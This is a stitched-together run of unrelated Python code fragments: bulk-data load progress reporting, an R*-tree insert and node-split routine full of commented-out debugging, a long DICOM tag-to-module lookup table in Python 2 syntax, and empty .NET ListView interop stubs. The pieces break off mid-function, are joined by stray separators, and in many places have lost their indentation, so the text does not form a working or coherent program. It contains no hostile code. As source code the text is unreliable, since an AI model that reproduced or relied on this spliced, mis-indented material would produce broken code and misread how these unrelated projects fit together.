            self.update_running_totals()
            self.print_running_totals()
            time.sleep(WAIT_TIME)
            # _report_status also raises if failures exceed ERROR_THRESHOLD.
            upload_status = self._report_status(
                portions.batch_size,
                org_record_counts_thread,
                template_path,
            )
        return upload_status
def _report_status(
self,
batch_size,
org_record_counts_thread,
template_path,
):
"""Let the user know what is going on."""
self.logger.info(
"\n********** PROGRESS *********",
)
upload_status = self.get_upload_status(
batch_size or 0,
)
self.logger.info(upload_status._display(detailed=self.debug_mode))
if upload_status.sets_failed:
# TODO: this is not sufficiently tested.
# commenting it out doesn't break tests
self.log_failures()
if upload_status.sets_failed > ERROR_THRESHOLD:
raise exc.BulkDataException(
f"Errors exceeded threshold: {upload_status.sets_failed} vs {ERROR_THRESHOLD}"
)
# TODO: Retrieve OrgRecordCounts code from
# https://github.com/SFDO-Tooling/CumulusCI/commit/7d703c44b94e8b21f165e5538c2249a65da0a9eb#diff-54676811961455410c30d9c9405a8f3b9d12a6222a58db9d55580a2da3cfb870R147
return upload_status
def update_running_totals(self) -> None:
"""Read and collate result reports from sub-processes/sub-threads
This is a realtime reporting channel which could, in theory, be updated
before sub-tasks finish. Currently no sub-tasks are coded to do that.
The logical next step is to allow LoadData to monitor steps one by
one or even batches one by one.
Note that until we implement that, we are paying the complexity
cost of a real-time channel but not getting the benefits of it.
"""
while True:
try:
results = self.queue_manager.get_results_report()
except Empty:
break
if "results" in results and "step_results" in results["results"]:
self.update_running_totals_from_load_step_results(results["results"])
elif "error" in results:
self.logger.warning(f"Error in load: {results}")
else: # pragma: no cover
self.logger.warning(f"Unexpected message from subtask: {results}")
def update_running_totals_from_load_step_results(self, results: dict) | |
low_y_distributions, upper_y_distributions = result
# consider cross-group overlap and combined area
candidate_distributions = None
if axis == 0:
candidate_distributions = low_x_distributions + upper_x_distributions
elif axis == 1:
candidate_distributions = low_y_distributions + upper_y_distributions
mbr_list_pair_tagged_candidate_distributions = [(([y.getMBR() for y in x[0]], [y.getMBR() for y in x[1]]), x) for x in candidate_distributions]
mbr_pair_tagged_candidate_distributions = [((CompositeMBR.makeMBR(x[0][0]), CompositeMBR.makeMBR(x[0][1])), x[1]) for x in mbr_list_pair_tagged_candidate_distributions]
overlap_value_tagged_candidate_distributions = [(MBR.findOverlapArea(x[0][0], x[0][1]), x[1]) for x in mbr_pair_tagged_candidate_distributions]
overlap_values = [x[0] for x in overlap_value_tagged_candidate_distributions]
min_overlap_value = min(overlap_values)
# print "overlap values:", overlap_values, min_overlap_value
matching_overlap_value_tagged_candidate_distributions = [x for x in overlap_value_tagged_candidate_distributions if x[0] == min_overlap_value]
next_next_candidates = [x[1] for x in matching_overlap_value_tagged_candidate_distributions]
# print next_next_candidates
if len(matching_overlap_value_tagged_candidate_distributions) > 1:
next_candidate_distributions = next_next_candidates
mbr_list_pair_tagged_candidate_distributions = [(([y.getMBR() for y in x[0]], [y.getMBR() for y in x[1]]), x) for x in next_candidate_distributions]
mbr_pair_tagged_next_candidate_distributions = [((CompositeMBR.makeMBR(x[0][0]), CompositeMBR.makeMBR(x[0][1])), x[1]) for x in mbr_list_pair_tagged_candidate_distributions]
combined_area_tagged_next_candidate_distributions = [(x[0][0].getArea() + x[0][1].getArea(), x[1]) for x in mbr_pair_tagged_next_candidate_distributions]
combined_area_values = [x[0] for x in combined_area_tagged_next_candidate_distributions]
# print "combined area values:", combined_area_values
# raise Exception()
min_combined_area_value = min(combined_area_values)
matching_combined_area_tagged_next_candidate_distributions = [x for x in combined_area_tagged_next_candidate_distributions if x[0] == min_combined_area_value]
next_next_candidates = [x[1] for x in matching_combined_area_tagged_next_candidate_distributions]
chosen_distribution_pair = next_next_candidates[0]
# print "chosen distribution pair:", chosen_distribution_pair
return chosen_distribution_pair
# we assume that >= 2 entries are provided
# we take special precautions to make the two returned entries be different
    # we assume that >= 2 entries are provided
    # we take special precautions to make the two returned entries be different
    @staticmethod
    def linearPickSeeds(entries):
        """Pick two seed entries for a node split (linear-cost heuristic).

        For each axis, find the entry with the highest low side and the
        entry with the lowest high side, normalize their separation by the
        total extent along that axis, and return the pair from the axis
        with the greater normalized separation.
        """
        mbr_list = [x.getMBR() for x in entries]
        # largest dead space along any dimension
        upper_left_points = [x.getUpperLeft() for x in mbr_list]
        lower_right_points = [x.getLowerRight() for x in mbr_list]
        points = upper_left_points + lower_right_points
        # overall extent of all rectangles, per axis
        x_values = [x[0] for x in points]
        y_values = [x[1] for x in points]
        min_x = min(x_values)
        max_x = max(x_values)
        min_y = min(y_values)
        max_y = max(y_values)
        x_size = max_x - min_x
        y_size = max_y - min_y
        x_values_upper_left = [x[0] for x in upper_left_points]
        y_values_upper_left = [x[1] for x in upper_left_points]
        x_values_lower_right = [x[0] for x in lower_right_points]
        y_values_lower_right = [x[1] for x in lower_right_points]
        highest_low_side_x = max(x_values_upper_left)
        lowest_high_side_x = min(x_values_lower_right)
        highest_low_side_y = max(y_values_upper_left)
        lowest_high_side_y = min(y_values_lower_right)
        x_separation = highest_low_side_x - lowest_high_side_x
        y_separation = highest_low_side_y - lowest_high_side_y
        # the +1 in the denominator avoids division by zero for
        # zero-width/zero-height extents
        normalized_x_separation = x_separation / (1.0 * x_size + 1)
        normalized_y_separation = y_separation / (1.0 * y_size + 1)
        # pick concrete MBRs responsible for each extreme; the second pick is
        # winnowed so the two seeds are guaranteed to be distinct MBRs
        x_responsible_mbr_candidates1 = [x for x in mbr_list if x.getUpperLeft()[0] == highest_low_side_x]
        chosen_x_responsible_mbr_candidate1 = x_responsible_mbr_candidates1[0]
        x_responsible_mbr_candidates2 = [x for x in mbr_list if x.getLowerRight()[0] == lowest_high_side_x]
        winnowed_x_responsible_mbr_candidates2 = [x for x in x_responsible_mbr_candidates2 if x != chosen_x_responsible_mbr_candidate1]
        # NOTE(review): assumes some candidate differs from the first seed;
        # if all extremes coincide this indexes an empty list — confirm
        # upstream guarantees >= 2 distinct MBRs.
        chosen_x_responsible_mbr_candidate2 = winnowed_x_responsible_mbr_candidates2[0]
        y_responsible_mbr_candidates1 = [x for x in mbr_list if x.getUpperLeft()[1] == highest_low_side_y]
        chosen_y_responsible_mbr_candidate1 = y_responsible_mbr_candidates1[0]
        y_responsible_mbr_candidates2 = [x for x in mbr_list if x.getLowerRight()[1] == lowest_high_side_y]
        winnowed_y_responsible_mbr_candidates2 = [x for x in y_responsible_mbr_candidates2 if x != chosen_y_responsible_mbr_candidate1]
        chosen_y_responsible_mbr_candidate2 = winnowed_y_responsible_mbr_candidates2[0]
        # map the chosen MBRs back to their owning entries
        chosen_x_responsible_entry_candidates1 = [x for x in entries if x.getMBR() == chosen_x_responsible_mbr_candidate1]
        chosen_x_responsible_entry_candidates2 = [x for x in entries if x.getMBR() == chosen_x_responsible_mbr_candidate2]
        chosen_y_responsible_entry_candidates1 = [x for x in entries if x.getMBR() == chosen_y_responsible_mbr_candidate1]
        chosen_y_responsible_entry_candidates2 = [x for x in entries if x.getMBR() == chosen_y_responsible_mbr_candidate2]
        chosen_x_entry1 = chosen_x_responsible_entry_candidates1[0]
        chosen_x_entry2 = chosen_x_responsible_entry_candidates2[0]
        chosen_y_entry1 = chosen_y_responsible_entry_candidates1[0]
        chosen_y_entry2 = chosen_y_responsible_entry_candidates2[0]
        # the two branches are exhaustive (>= covers the tie case)
        if normalized_y_separation >= normalized_x_separation:
            return (chosen_y_entry1, chosen_y_entry2)
        elif normalized_x_separation > normalized_y_separation:
            return (chosen_x_entry1, chosen_x_entry2)
def chooseLeaf(self, entry):
return self.chooseLeafHelper(entry, self.getRootEntry().getChild())
def chooseLeafHelper(self, entry, node):
if node.isLeafNode() == True:
if node == self.getRootEntry().getChild():
return node
else:
return node.getParent()
else:
entries = node.getEntries()
candidate_entries = self.chooseEntriesWithMinimalAreaEnlargement(entries, entry)
if len(candidate_entries) != 1:
# resolve a tie
candidate_entries = self.resolveEnlargementTie(candidate_entries, entry)
chosen_entry = candidate_entries[0]
chosen_child = chosen_entry.getChild()
return self.chooseLeafHelper(entry, chosen_child)
def rstarChooseLeaf(self, entry):
return self.rstarChooseLeafHelper(entry, self.getRootEntry().getChild())
def rstarChooseLeafHelper(self, entry, node):
if node.isLeafNode() == True:
if node == self.getRootEntry().getChild():
return node
else:
return node.getParent()
else:
entries = node.getEntries()
candidate_entries = None
# if node.isLeafNode() == True:
candidate_entries = self.chooseEntriesWithMinimalOverlapEnlargement(entries, entry)
if len(candidate_entries) != 1:
# resolve a tie
candidate_entries = self.chooseEntriesWithMinimalAreaEnlargement(candidate_entries, entry)
if len(candidate_entries) != 1:
# resolve a tie
candidate_entries = self.resolveEnlargementTie(candidate_entries, entry)
"""
else:
candidate_entries = self.chooseEntriesWithMinimalAreaEnlargement(entries, entry)
if len(candidate_entries) != 1:
# resolve a tie
candidate_entries = self.resolveEnlargementTie(candidate_entries, entry)
"""
chosen_entry = candidate_entries[0]
chosen_child = chosen_entry.getChild()
return self.rstarChooseLeafHelper(entry, chosen_child)
    def insert(self, entry):
        """Insert `entry` using R*-style descent and node splitting.

        Steps: (1) choose a leaf-level node; (2) add the entry there, or
        split the node if it is full; (3) propagate MBR adjustments and
        splits upward via RTree.rstarAdjustTree; (4) if the adjustment ends
        by requiring a root split, grow the tree one level taller.
        """
        # -- historical debugging traces, retained verbatim --
        # print entry.getMBR().toString()
        # print entry.getMBR().getUpperLeft()[0]
        # if abs(entry.getMBR().getUpperLeft()[0] - 988266.168186) < 0.1:
        # if abs(entry.getMBR().getUpperLeft()[0] - 185061.9338) < 0.1:
        # if abs(entry.getMBR().getUpperLeft()[0] - 75898.2202098) < 0.1:
        """
        if abs(entry.getMBR().getUpperLeft()[0] - 185061.9338) < 0.1:
            # raise Exception()
            pass
        """
        # print "inserting an entry"
        """
        if self.hasConsistentNonTraditionalLeafDepthValues() == False and self.getRootEntry().getChild().isLeafNode() == False:
            # raise Exception()
            pass
        """
        """
        if self.getRoot().getNumChildren() > self.getRoot().getMaximumNumEntriesPerNode():
            raise Exception()
        """
        """
        encountered_item = False
        # if entry.getMBR().getContainedItem() == (962736.900780, 317162.3926449):
        if entry.getMBR().getContainedItem()[0] == 835394.40839:
            encountered_item = True
        if encountered_item == True:
            print self.toString()
            raise Exception()
        """
        # Find the node that should receive the new entry.
        leaf_node = self.rstarChooseLeaf(entry)
        adjust_result = None
        # print "leaf is full:", leaf_node.isFull()
        if leaf_node.isFull() == False:
            # leaf_node.setIsLeafNode(True)
            # do not have to split node
            leaf_node.addEntry(entry)
            # this may be unnecessary
            entry.getChild().setParent(leaf_node)
            # print "leaf node entries:", leaf_node.getEntries()
            # print "added an entry to a leaf:", entry
            # print "leaf node:", leaf_node
            # print "root node:", self.getRoot()
            # print leaf_node == self.getRoot()
            # print leaf_node.toString()
            # entry.getChild().setParent(leaf_node)
            # call adjustTree to resize bounding boxes of current node and ancestors and propagate splits
            # RTree.rstarPreadjustTree(self, leaf_node)
            adjust_result = RTree.rstarAdjustTree(self, leaf_node, [entry], False)
        else:
            # split node
            # split_result = self.rstarSplitNode(leaf_node.getChildren()[0], entry)
            split_result = self.rstarSplitNode(leaf_node, entry)
            # l and ll are internal nodes; e and ee are their parent entries
            l, ll, e, ee = split_result
            # print leaf_node == self.getRoot()
            # print leaf_node.getParent().getEntries(), e, ee
            # if leaf_node != self.getRoot() and leaf_node.getParent() != None:
            if leaf_node.getParent() != None:
                # adjust fields related to existence of a parent
                # (handled by rstarAdjustTree below; the manual version is
                # kept disabled for reference)
                """
                parent = leaf_node.getParent()
                leaf_entry = parent.retrieveEntryForChild(leaf_node)
                index = parent.getIndexForEntry(leaf_entry)
                parent.removeIthEntry(index)
                parent.addEntry(e)
                parent.addEntry(ee)
                l.setParent(parent)
                ll.setParent(parent)
                """
                pass
            else:
                # split but do not have parent; so, we create one
                pass
                # print "split node is root"
                """
                next_root = RTreeNode(None, [e, ee], False)
                l.setParent(next_root)
                ll.setParent(next_root)
                # next_root.addEntry(e)
                # next_root.addEntry(ee)
                self.setRoot(next_root)
                """
            # we might be able to handle propagating the first split manually,
            # and we would continue as if we currently have no split to propagate
            # e and ee are for entries for the two children that result from split of pre-cursor to l
            # RTree.rstarPreadjustTree(self, l)
            adjust_result = RTree.rstarAdjustTree(self, l, [e, ee], True)
        # check result of tree-adjust to see whether we plan on splitting root
        # in case the root has to be split, create a new root
        # increase the height of the tree by one
        # grow tree taller
        # NOTE: rstarAdjustTree returns (ended_with_split, entries_from_split)
        ended_with_split2, resulting_entries_from_split = adjust_result
        # return from an "adjust" action is always to do with root
        # print "ended with split:", ended_with_split2
        # we ended adjust-tree by requiring a split of root
        if ended_with_split2 == True:
            # return
            # raise Exception()
            e, ee = resulting_entries_from_split
            l = e.getChild()
            ll = ee.getChild()
            # print "num. of entries:", tree.getRoot().getNumEntries()
            if (self.getRootEntry().getChild().getNumEntries() + 1) <= self.getRootEntry().getChild().getMaximumNumEntriesPerNode():
                # there is space at root
                # tree.getRoot().addEntry(e)
                # raise Exception()
                self.getRootEntry().getChild().addEntry(ee)
                # l.setParent(tree.getRoot())
                ll.setParent(self.getRootEntry().getChild())
            else:
                # the root itself is full: split it, then grow a new root
                # holding the two resulting entries
                # split_result = tree.rstarSplitNode(tree.getRoot().getChildren()[0], ee)
                split_result = self.rstarSplitNode(self.getRootEntry().getChild(), ee)
                l, ll, e, ee = split_result
                # e, ee = resulting_entries_from_split
                # print "resulting entries:", resulting_entries_from_split
                resulting_entries_from_split = [e, ee]
                next_root = RTreeNode(None, resulting_entries_from_split, False)
                # next_root.addEntry(e)
                # next_root.addEntry(ee)
                """
                l = e.getChild()
                ll = ee.getChild()
                """
                l.setParent(next_root)
                ll.setParent(next_root)
                # print "have a next root:", next_root
                self.getRootEntry().setChild(next_root)
                # print "modified root as part of an insert"
        else:
            # print "entries included:", e in l.getParent().getEntries()
            pass
# make available two nodes l and ll
# and make available two entries e and ee
# "node" is the node that we split
# by additionally introducing entry "entry"
# we also add the created entries to parent
def rstarSplitNode(self, node, entry):
curr_node = node
E_overall = list(set(curr_node.getEntries() + [entry]))
return self.rstarSplitNodeHelper(node, E_overall, entry)
def rstarSplitNodeHelper(self, node, E_overall, entry):
# print "splitting a node"
# print "pre-split-node tree:", tree.toNumChildrenString()
# print node == self.getRoot()
# print node.getNumEntries()
# find | |
BYTE SC IMAGE IOD': ['Study'],
'COMPREHENSIVE SR IOD': ['Study'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Study'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Study'],
'SPATIAL FIDUCIALS IOD': ['Study'],
'RT ION PLAN IOD': ['Study'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Study'],
'CT IMAGE IOD': ['Study'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Study'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Study'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Study'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'RT DOSE IOD': ['Study'],
'AMBULATORY ECG IOD': ['Study'],
'SURFACE SEGMENTATION IOD': ['Study'],
'MAMMOGRAPHY CAD SR IOD': ['Study'],
'VL MICROSCOPIC IMAGE IOD': ['Study'],
'RT BEAMS TREATMENT RECORD IOD': ['Study'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Study'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Study'],
'RT IMAGE IOD': ['Study'],
'SC IMAGE IOD': ['Study'],
None: ['Study', 'Modality Performed Procedure Step'],
'SEGMENTATION IOD': ['Study'],
'PET IMAGE IOD': ['Study'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'DIGITAL X-RAY IMAGE IOD': ['Study'],
'REAL WORLD VALUE MAPPING IOD': ['Study'],
'SPATIAL REGISTRATION IOD': ['Study'],
'COLON CAD SR IOD': ['Study'],
'INTRAVASCULAR OCT IMAGE IOD': ['Study'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'ENHANCED PET IMAGE IOD': ['Study'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Study'],
'US MULTI-FRAME IMAGE IOD': ['Study'],
'ENHANCED X-RAY RF IMAGE IOD': ['Study'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Study'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Study'],
'US IMAGE IOD': ['Study'],
'GENERAL ECG IOD': ['Study'],
'XRF IMAGE IOD': ['Study'],
'ENCAPSULATED CDA IOD': ['Study'],
'ENHANCED SR IOD': ['Study'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Study'],
'GENERAL AUDIO WAVEFORM IOD': ['Study'],
'MR IMAGE IOD': ['Study'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Study'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Study'],
'ARTERIAL PULSE WAVEFORM IOD': ['Study'],
},
# OverallTemplateSpatialTolerance
0x006862A5L: {
'GENERIC IMPLANT TEMPLATE IOD': ['Implant Template'],
None: ['Implant Template'],
},
# MRAcquisitionType
0x00180023L: {
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'ENHANCED MR IMAGE IOD': ['Image'],
'MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# NumberOfTimeSlots
0x00540071L: {
'NM IMAGE IOD': ['Image'],
'PET IMAGE IOD': ['Series'],
None: ['Image', 'Series'],
},
# FrequencyCorrection
0x00189101L: {
'MR SPECTROSCOPY IOD': ['Equipment'],
None: ['Equipment'],
},
# OperatorIdentificationSequence
0x00081072L: {
'BASIC STRUCTURED DISPLAY IOD': ['Series'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Series'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Series'],
None: ['Series'],
'SEGMENTATION IOD': ['Series'],
'BASIC VOICE AUDIO IOD': ['Series'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Series'],
'SC IMAGE IOD': ['Series'],
'GENERAL ECG IOD': ['Series'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'DIGITAL X-RAY IMAGE IOD': ['Series'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Series'],
'SPATIAL FIDUCIALS IOD': ['Series'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Series'],
'RAW DATA IOD': ['Series'],
'INTRAVASCULAR OCT IMAGE IOD': ['Series'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'REAL WORLD VALUE MAPPING IOD': ['Series'],
'ENHANCED MR IMAGE IOD': ['Series'],
'CT IMAGE IOD': ['Series'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Series'],
'NM IMAGE IOD': ['Series'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Series'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'US MULTI-FRAME IMAGE IOD': ['Series'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Series'],
'STEREOMETRIC RELATIONSHIP IOD': ['Series'],
'BASIC CARDIAC EP IOD': ['Series'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'PET IMAGE IOD': ['Series'],
'LENSOMETRY MEASUREMENTS IOD': ['Series'],
'MR SPECTROSCOPY IOD': ['Series'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Series'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Series'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Series'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Series'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Series'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Series'],
'ARTERIAL PULSE WAVEFORM IOD': ['Series'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Series'],
'HEMODYNAMIC IOD': ['Series'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Series'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Series'],
'US IMAGE IOD': ['Series'],
'AMBULATORY ECG IOD': ['Series'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Series'],
'12-LEAD ECG IOD': ['Series'],
'MR IMAGE IOD': ['Series'],
'ENHANCED MR COLOR IMAGE IOD': ['Series'],
'ENHANCED CT IMAGE IOD': ['Series'],
'XRF IMAGE IOD': ['Series'],
'RESPIRATORY WAVEFORM IOD': ['Series'],
'GENERAL AUDIO WAVEFORM IOD': ['Series'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Series'],
'SURFACE SEGMENTATION IOD': ['Series'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Series'],
'VL MICROSCOPIC IMAGE IOD': ['Series'],
'SPATIAL REGISTRATION IOD': ['Series'],
'ENHANCED PET IMAGE IOD': ['Series'],
'ENHANCED X-RAY RF IMAGE IOD': ['Series'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Series'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Series'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Series'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Series'],
'VL ENDOSCOPIC IMAGE IOD': ['Series'],
'KERATOMETRY MEASUREMENTS IOD': ['Series'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Series'],
'CR IMAGE IOD': ['Series'],
},
# FirstALineLocation
0x00520034L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
None: ['Image'],
},
# ReferencedStorageMediaSequence
0x2200000DL: {
'MEDIA CREATION MANAGEMENT IOD': ['Media Creation Management'],
None: ['Media Creation Management'],
},
# AcquisitionDuration
0x00189073L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
'ENHANCED MR IMAGE IOD': ['Image'],
None: ['Image', 'Equipment'],
'ENHANCED PET IMAGE IOD': ['Image'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Image'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Image'],
'ENHANCED X-RAY RF IMAGE IOD': ['Image'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Image'],
'MR SPECTROSCOPY IOD': ['Equipment'],
'ENHANCED CT IMAGE IOD': ['Image'],
},
# ImagedVolumeWidth
0x00480001L: {
'VL WHOLE SLIDE MICROSCOPY IOD': ['Image'],
None: ['Image'],
},
# ALinePixelSpacing
0x00520014L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
None: ['Image'],
},
# RadiopharmaceuticalInformationSequence
0x00540016L: {
'NM IMAGE IOD': ['Image'],
'ENHANCED PET IMAGE IOD': ['Image'],
'PET IMAGE IOD': ['Series'],
None: ['Image', 'Series'],
},
# AcquisitionStartConditionData
0x00180074L: {
'PET IMAGE IOD': ['Series'],
None: ['Series'],
},
# MultipleCopiesFlag
0x00404006L: {
'GENERAL PURPOSE SCHEDULED PROCEDURE STEP IOD': ['General Purpose Scheduled Procedure Step'],
None: ['General Purpose Scheduled Procedure Step'],
},
# WholeBodyTechnique
0x00181301L: {
'NM IMAGE IOD': ['Image'],
None: ['Image'],
},
# ShortTermFluctuation
0x00240075L: {
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
None: ['Measurements'],
},
# HPGLDocumentSequence
0x006862C0L: {
'GENERIC IMPLANT TEMPLATE IOD': ['Implant Template'],
None: ['Implant Template'],
},
# VerticesOfThePolygonalCollimator
0x00181720L: {
None: ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'XRF IMAGE IOD': ['Image'],
},
# PixelIntensityRelationshipSign
0x00281041L: {
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
'RT IMAGE IOD': ['Image'],
None: ['Image'],
},
# ReferencedOtherPlaneSequence
0x00089410L: {
'ENHANCED X-RAY RF IMAGE IOD': ['Image'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
None: ['Image'],
},
# GeneralPurposeScheduledProcedureStepStatus
0x00404001L: {
'GENERAL PURPOSE SCHEDULED PROCEDURE STEP IOD': ['General Purpose Scheduled Procedure Step'],
None: ['General Purpose Scheduled Procedure Step'],
},
# NominalInterval
0x00181062L: {
'US MULTI-FRAME IMAGE IOD': ['Image'],
'US IMAGE IOD': ['Image'],
'PET IMAGE IOD': ['Image'],
'MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# NumberOfPhaseEncodingSteps
0x00180089L: {
'MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# StructureSetLabel
0x30060002L: {
'RT STRUCTURE SET IOD': ['Structure Set'],
'RT DOSE IOD': ['Dose'],
None: ['Structure Set', 'Dose'],
},
# VisualFieldMeanSensitivity
0x00240070L: {
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
None: ['Measurements'],
},
# StageName
0x00082120L: {
'US MULTI-FRAME IMAGE IOD': ['Image'],
'US IMAGE IOD': ['Image'],
None: ['Image'],
},
# AuthorObserverSequence
0x0040A078L: {
'SPECTACLE PRESCIPTION REPORT IOD': ['Document'],
'ENHANCED SR IOD': ['Document'],
'MAMMOGRAPHY CAD SR IOD': ['Document'],
'BASIC TEXT SR IOD': ['Document'],
'X-RAY RADIATION DOSE SR IOD': ['Document'],
'PROCEDURE LOG IOD': ['Document'],
'CHEST CAD SR IOD': ['Document'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Document'],
None: ['Document'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Document'],
'COMPREHENSIVE SR IOD': ['Document'],
'COLON CAD SR IOD': ['Document'],
},
# ScatterFractionFactor
0x00541323L: {
'PET IMAGE IOD': ['Image'],
None: ['Image'],
},
# TextString
0x20300020L: {
'BASIC ANNOTATION BOX IOD': ['Basic Annotation Box'],
None: ['Basic Annotation Box'],
},
# ImagePathFilterTypeStackCodeSequence
0x00220018L: {
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Image'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Image'],
None: ['Image'],
},
# CorrectedLocalizedDeviationFromNormal
0x00240079L: {
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
None: ['Measurements'],
},
# PerformedProcessingApplicationsCodeSequence
0x00404007L: {
'GENERAL PURPOSE PERFORMED PROCEDURE STEP IOD': ['General Purpose Performed Procedure Step'],
None: ['General Purpose Performed Procedure Step'],
},
# EstimatedDoseSaving
0x00189324L: {
'CT IMAGE IOD': ['Image'],
None: ['Image'],
},
# ScanLength
0x00181302L: {
'NM IMAGE IOD': ['Image'],
None: ['Image'],
},
# TimeOfSecondaryCapture
0x00181014L: {
'SC IMAGE IOD': ['Image'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Image'],
None: ['Image'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Image'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Image'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Image'],
},
# DeviationIndex
0x00181413L: {
None: ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'ENHANCED X-RAY RF IMAGE IOD': ['Image'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'XRF IMAGE IOD': ['Image'],
'CR IMAGE IOD': ['Image'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
},
# ProcedureTypeCodeSequence
0x00760020L: {
'IMPLANT ASSEMBLY TEMPLATE IOD': ['Implant Assembly'],
None: ['Implant Assembly'],
},
# ObservationDateTime
0x0040A032L: {
'SPECTACLE PRESCIPTION REPORT IOD': ['Document'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Document'],
'MAMMOGRAPHY CAD SR IOD': ['Document'],
'BASIC TEXT SR IOD': ['Document'],
'X-RAY RADIATION DOSE SR IOD': ['Document'],
| |
its client area.
clientSize: A System.Drawing.Size value representing the height and width of the control's client area.
Returns: A System.Drawing.Size value representing the height and width of the entire control.
"""
pass
def Sort(self):
    """
    Sort(self: ListView)
    Sorts the items of the list view.
    """
    # Autogenerated .NET interop stub: the real implementation is provided
    # by the CLR at runtime; the Python body is intentionally empty.
    pass
def ToString(self):
    """
    ToString(self: ListView) -> str
    Returns a string representation of the System.Windows.Forms.ListView control.
